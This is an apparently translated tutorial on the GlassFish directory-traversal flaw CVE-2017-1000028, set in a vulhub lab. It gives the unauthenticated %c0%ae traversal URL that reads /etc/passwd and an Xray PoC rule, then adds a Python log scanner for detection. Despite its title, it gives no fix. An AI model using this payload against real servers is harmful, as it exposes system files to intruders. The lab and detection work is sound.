2025-01-17 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article shares how to fix the GlassFish arbitrary file read vulnerability. Most people are probably not very familiar with it, so it is shared here for your reference. I hope you learn a lot from it. Let's get started.
GlassFish arbitrary file read vulnerability
Port: 4848
Vulnerability principle
GlassFish is a cross-platform, open source application server written in Java.
In Java, %c0%ae is parsed as \uC0AE and is finally converted to the ASCII character . (dot). Using %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ to move up the directory tree achieves directory traversal and arbitrary file reading. So this GlassFish PoC is actually ../etc/passwd.
Affected versions:
< 4.1.1 (excluding 4.1.1)
Vulnerability reproduction
The following test environment uses the vulhub Docker image, with the link from Master P attached: https://github.com/vulhub/vulhub
Compile and run the test environment. The super administrator password of this environment is set in docker-compose.yml and defaults to vulhub_default_password. The password can be used to log in to the administrator account on port 4848.
docker-compose up -d
After the environment is running, visit http://your-ip:8080 and http://your-ip:4848 to view the web page. Among them, port 8080 is the website content and port 4848 is the GlassFish management center.
Without logging in, access https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd directly. The contents of /etc/passwd are read successfully.
POC & EXP
The following is Xray's PoC. It only traverses to the parent directory and reads version information, so it does not touch sensitive information, yet it still verifies that the vulnerability exists.
    name: poc-yaml-glassfish-cve-2017-1000028-lfi
    rules:
      - method: GET
        path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF
        follow_redirects: true
        expression: |
          response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:")
    detail:
      version:
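For detection, the request pattern above can be found in access logs. The bytes 0xC0 0xAE are an overlong two-byte UTF-8 encoding of U+002E (the dot), which a strict UTF-8 decoder rejects. The following is an added example, not part of the original article or of Xray. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jan/2025:10:00:01 +0000] "GET /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Jan/2025:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [17/Jan/2025:10:00:03 +0000] "GET /caf%C3%A9/menu.html HTTP/1.1" 200 900',
    '198.51.100.8 - - [17/Jan/2025:10:00:04 +0000] "GET /static/%2e%2e/%2e%2e/app.conf HTTP/1.1" 404 0',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def lenient_decode(raw: bytes) -> str:
    """Decode the way a non-strict UTF-8 decoder would: 2-byte sequences are
    accepted even when overlong, so C0 AE becomes '.'. Other bytes map 1:1."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and raw[i + 1] & 0xC0 == 0x80:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def inspect(line: str):
    """Return a finding dict for one log line, or None if it has no request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = unquote_to_bytes(m.group(1).split("?", 1)[0])
    decoded = lenient_decode(raw)
    # 0xC0/0xC1 can only begin overlong encodings of ASCII; valid UTF-8 never uses them.
    overlong = any(b in (0xC0, 0xC1) for b in raw)
    traversal = ".." in decoded.split("/")
    return {"path": m.group(1), "decoded": decoded,
            "overlong": overlong, "traversal": traversal}


def scan(lines):
    """Findings worth alerting on: overlong bytes or a '..' path segment."""
    findings = [f for f in map(inspect, lines) if f]
    return [f for f in findings if f["overlong"] or f["traversal"]]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The overlong check alone is a low-noise signal because legitimate UTF-8 paths, such as the constructed café line, never contain the bytes 0xC0 or 0xC1.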